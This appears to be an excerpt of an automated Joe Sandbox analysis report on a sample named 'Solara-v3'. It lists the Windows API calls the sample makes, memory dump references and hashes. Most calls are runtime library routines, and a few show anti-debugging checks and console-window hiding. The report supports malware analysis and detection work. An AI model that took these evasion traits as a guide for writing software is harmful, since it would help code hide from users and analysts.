• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C9F8F5
• IsDebuggerPresent.KERNEL32 ref: 00C9F9C1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C9F9DA
• UnhandledExceptionFilter.KERNEL32(?), ref: 00C9F9E4
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00C9FE70
• __alloca_probe_16.LIBCMT ref: 00C9FE9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00C9FEDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C9FEF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9FF37
• __alloca_probe_16.LIBCMT ref: 00C9FF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C9FF96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C9FFB9
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00CA0D77
• ___except_validate_context_record.LIBVCRUNTIME ref: 00CA0D7F
• _ValidateLocalCookies.LIBCMT ref: 00CA0E08
• __IsNonwritableInCurrentImage.LIBCMT ref: 00CA0E33
• _ValidateLocalCookies.LIBCMT ref: 00CA0E88
Strings
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
• GetConsoleWindow.KERNEL32 ref: 00C924DD
• ShowWindow.USER32(00000000,00000000), ref: 00C924E6
• GetCurrentThreadId.KERNEL32 ref: 00C92524
  • Part of subcall function 00C9F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00C9253A,?,?,00000000), ref: 00C9F129
  • Part of subcall function 00C9F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00C9253A,?,?,00000000), ref: 00C9F142
  • Part of subcall function 00C9F11D: CloseHandle.KERNEL32(?,?,?,00C9253A,?,?,00000000), ref: 00C9F154
• std::_Throw_Cpp_error.LIBCPMT ref: 00C92567
• std::_Throw_Cpp_error.LIBCPMT ref: 00C92578
• std::_Throw_Cpp_error.LIBCPMT ref: 00C92589
• std::_Throw_Cpp_error.LIBCPMT ref: 00C9259A
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
• String ID:
• API String ID: 3956949563-0
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00CAD01A,00C91170,00C9AA08,?,?), ref: 00CACFCC
Strings
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA0086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA0094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA00A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                              • Opcode ID: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction ID: 0de4e9b997e5fd6b0e9685be1fa13a83a0c1b091f76c41c46dd3568c502bcfd8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c880fdf94e2cdc7ad2c8fe2cc696eab4ff874da8e31195276efff2317a950719
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C7315412106B83109FB4FD0DFCD3EB9FA09711311816BF445D2760DF7545018758
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 99eb8bcc9c90e2132c687cdba1e7bfa36d9d66c6c08e0eab56e052e072c06160
                                                                                                                                                                                                                                              • Instruction ID: 7c466a466b04c61ec36f489d3a4ff630beb2517734b73c1ecbcf4745b183cd38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99eb8bcc9c90e2132c687cdba1e7bfa36d9d66c6c08e0eab56e052e072c06160
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AB12470E08A499FDB05DFA9D881BEEBBB4BF46304F144258F511AB392C7719E41CBA1
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99C97
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CA8
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CBC
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CDD
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99CEE
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C99D06
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2134207285-0
                                                                                                                                                                                                                                              • Opcode ID: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction ID: e7719b9e1c8a020963ba341ce1e3916c9e2f722c28e65b6a491fc010db7951b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bac659b62ddd5e00b6e7ff89eaefbc1eb09212985416604bf6332b567dab384
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41A0B1900740DBDF30DB698D0A7ABB7F4FF45320F18062DD57A26291D771AA04CBA2
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CAACDE,00CA0760,00C9B77F,BB40E64E,?,?,?,?,00CBBFCA,000000FF), ref: 00CAACF5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CAAD03
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CAAD1C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00CAACDE,00CA0760,00C9B77F,BB40E64E,?,?,?,?,00CBBFCA,000000FF), ref: 00CAAD6E
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 2a6a3c02d6077bdc1c335910d5cdb9696e081bfaa363f59219c9e26d1f56c5ea
                                                                                                                                                                                                                                              • Instruction ID: 807ea783ca2d7325a7fff08239e9faf3fcbeb9733c108e65d62ed925ddd9eb25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a6a3c02d6077bdc1c335910d5cdb9696e081bfaa363f59219c9e26d1f56c5ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01A0326157175EA72417F5FC46F6E2698E703B7DB24033AF560555F0EF624C02E641
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00CAB68D
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00CAB906
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9BF44
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9C028
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA55F9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA560B
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00CA556C,?,00CA5721,00000000), ref: 00CA562D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD76F
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD838
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD89F
                                                                                                                                                                                                                                                • Part of subcall function 00CABF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00C9A67D,00000018,?,00C93D4A,00000018,00000000), ref: 00CABF43
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8B2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(?,00C9EFCE,00C98E30,00000000,?,00C98E30,00C9A2F0), ref: 00C9F005
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38), ref: 00C9F024
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F052
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0AD
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 66001078-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CA5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CBF
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93CE0
                                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00C93D92
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93DD8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3087743877-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9D4C9
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9D4D3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9D4EA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00C9D50D
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9D544
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9ADDE
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9ADE9
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9AE57
                                                                                                                                                                                                                                                • Part of subcall function 00C9ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C9ACC2
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C9AE04
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00C9AE1A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9B809
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C), ref: 00CB694D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C,00000000,?,00CABBBC), ref: 00CB6957
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB697F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00CB4001
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB4253
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CB4299
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CB433C
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C972C5
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C97395
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973A3
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973B1
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2261580123-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C94495
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C944B2
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C944D3
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94580
Memory Dump Source
• Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E2A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E31
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E6B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E72
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CB31C6
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB31FE
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB321E
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9E899
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9E8A3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9E8BA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9E914
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000), ref: 00CBADB7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?,?,00CB3CD6,00000000), ref: 00CBADC3
                                                                                                                                                                                                                                                • Part of subcall function 00CBAE20: CloseHandle.KERNEL32(FFFFFFFE,00CBADD3,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?), ref: 00CBAE30
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00CBADD3
                                                                                                                                                                                                                                                • Part of subcall function 00CBADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CBAD91,00CBA2DC,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBAE08
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBADE8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmp
